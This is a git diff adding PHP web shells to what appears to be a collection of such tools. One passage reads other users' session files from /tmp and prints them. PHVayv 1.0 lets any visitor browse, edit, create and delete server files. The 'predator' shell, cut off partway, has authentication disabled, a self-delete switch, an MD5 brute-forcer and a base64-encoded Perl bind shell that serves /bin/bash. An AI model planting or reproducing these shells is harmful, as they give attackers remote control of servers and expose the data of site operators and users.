+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Adý</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Deðeri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+
diff --git a/xakep-shells/PHP/phvayvv.php.php.txt b/xakep-shells/PHP/phvayvv.php.php.txt
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/xakep-shells/PHP/phvayvv.php.php.txt
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/predator.php.php.txt b/xakep-shells/PHP/predator.php.php.txt
new file mode 100644
index 0000000..19e2ed7
--- /dev/null
+++ b/xakep-shells/PHP/predator.php.php.txt
@@ -0,0 +1,1367 @@
+<?php
+$auth = 0;
+
+
+
+ini_set("session.gc_maxlifetime",1);
+session_start();
+error_reporting(0);
+safe_mode();
+$name="9b534ea55d0b82c3a7e80003a84b6865";     //login = 'mylogin'
+$pass="a029d0df84eb5549c641e04a9ef389e5";     //pass  = 'mypass'
+if($auth == 1){
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+}
+
+if($_GET['kill']=='yes')
+{
+unlink($_SERVER['SCRIPT_FILENAME']);
+echo "<script>alert('Your shell script was succefully deleted!')</script>";
+}
+
+
+function md5_brute($hash,$log,$dict)
+{
+ignore_user_abort(1);
+set_time_limit(0);
+
+$fl = fopen($dict, "r");
+$fl = fopen($log, "w");
+$count = 0;
+if(!$dict){
+return "Fill 'dictionary_file' field!";
+}if(!$log){
+return "Fill 'log_file' field!";
+}elseif(!strlen($hash) == 0){
+return "Fill 'md5_hash' field!";
+}else{
+	while(!$feof($dict)){
+		$pass = fgets($dict);
+		$brute_hash = md5($pass);
+		if($brute_hash == $hash){
+			fputs($log, "$hash:$pass\n---");
+			fclose($dict);
+			fclose($log);
+			exit;
+		}else{
+			$count = $count + 1;
+			fputs($log, "$count passwords was bruted...");
+		}
+	}
+	fputs($log, "$count passwords are failed!");
+}
+fclose($dict);
+fclose($log);
+}
+
+function port_bind($port,$pass,$method)
+{
+$perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
